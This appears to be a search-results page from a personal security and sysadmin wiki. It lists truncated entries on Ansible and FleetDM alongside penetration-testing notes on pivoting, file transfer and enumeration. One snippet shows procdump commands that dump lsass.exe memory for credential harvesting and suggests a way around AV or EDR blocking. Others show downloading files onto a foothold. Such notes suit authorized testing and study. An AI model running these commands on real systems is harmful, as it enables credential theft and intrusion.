Search Results
166 total results found
Computer Programming
Hydra
Printers
Everyone loves to hate them (and with good reason)
SSH Port Forwarding
Security Considerations Reverse Tunneling This will require you to establish an SSH connection from the foothold back to your attack box. You want to mitigate any potential for this authentication to be used against you Public Key Authentication Say ...
Windows File Downloads
PowerShell [System.Net.WebClient]::new().DownloadFile(uri, outpath) # Example [System.Net.WebClient]::new().DownloadFile('http://somesite.com/file.txt', 'C:\Users\username\Desktop\file.txt') # Older versions of PS $wc = New-Object System.Net.WebClient $wc.Dow...
VirtualHost Enumeration
VirtualHosts Examples ...
Directory and File Enumeration
Serving Files From a Web Server NGINX /etc/nginx/sites-available/example.com.conf server { listen 80; server_name www.example.com; root /var/www/example.com; index index.html; location / { try_files ...
Parameter and Value Fuzzing
Serving Files From a Web Server NGINX /etc/nginx/sites-available/example.com.conf server { listen 80; server_name www.example.com; root /var/www/example.com; index index.html; location / { try_files ...
Dumping Hashes without Mimikatz
Post-Compromise on Target Lsass Process Dump Sysinternals ProcDump Download ProcDump here # Dump the in-memory data from the process procdump.exe -accepteula -ma lsass.exe out.dmp # If blocked by AV or EDR, try passing the process ID procdump.exe -acc...
Disable Terminal Chime
Linux User Scope Set this line in ~/.inputrc set bell-style none Then, run this command: bind -f ~/.inputrc System Wide Set this line in /etc/inputrc set bell-style none Then, run this command: bind -f /etc/inputrc Vim - User Scope Add this line to ~/.vi...
File Transfer Techniques
TFTP If the target has a TFTP client installed, Metasploit has a TFTP server you can run ad-hoc on your attack box to transfer files https://www.rapid7.com/db/modules/auxiliary/server/tftp/ Attack Box Side # Start Metasploit Framework sudo msfconsole # ...
Defining the Inventory
Defining the Inventory The inventory is everything when it comes to Ansible. Your inventory is your set of hosts to be managed by Ansible. It could be a handful of hosts to a few hundred hosts. The default location for global Ansible configurations is ...
Defining Group Variables and Protecting Secrets
Group Variables Back on Defining the Inventory, you may remember that we broke the inventory up into groups. Groups are a convenient way to break hosts up into units like: Operating system Region Category Using the operating system grouping system, you could...
Example Playbook from Start to Finish
Configuring Ansible Copy the global config to my home directory. That way, I'll keep my Ansible environment how I like it. cp /etc/ansible/ansible.cfg ~/.ansible.cfg # Create a directory to store my inventory mkdir ~/.ansible # Create a file to use fo...
Automating with AWS Secrets Manager
Use Case In this scenario the following is true: You have an Ansible server in AWS You have AWS EC2 instances you'd like to manage as inventory Define a Secrets Naming Scheme You'll want your Ansible server to be able to hit the AWS Secrets Manager ...
Port Forwarding with Chisel
GitHub Download from the Releases Page Usage Requires a copy of the Chisel binary on: The target host The attacker's host. Chisel also supports authenticated proxies to prevent unwanted connections. Chisel Advantages Chisel is a portable bi...
Penetrating Networks via SSH JumpHosts
Enumerating NFS
General Information portmapper and rpcbind run on TCP 111 rpcbind maps RPC services to their listening ports RPC processes notify rpcbind of the following when they start: Ports they're listening on RPC program numbers they expect to serve A clie...
Installing FleetDM Management Server
Create Debian 11 Host apt update && apt upgrade -y && apt install -y sudo gnupg net-tools dnsutils binutils git curl Install MySQL Server Download .deb package from here Run sudo dpkg -i ./package.deb Select MySQL 8 Select OK Run sudo apt update...
Adding FleetDM Hosts via Ansible
Other Install Options Of course, the main focus of this page is to demonstrate the convenience of Ansible with respect to pushing and installing software to a batch of hosts. You don't have to use Ansible to install Fleet DM Osquery agents on your endpoints! ...
Adding Default Queries Library
Set API Context SSH into FleetDM management server Set the API address: fleetctl config set --address https://fleetdm.home.lab:8080 My TLS certificate is self-signed, so I will skip verification: fleetctl config set --tls-skip-verify true Login to the AP...
Penetrating Networks via Chisel Proxies
LdapSearch
When to Use You'll know when you've found a domain controller, because it will have several ports open that clearly distinguish it: PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn ...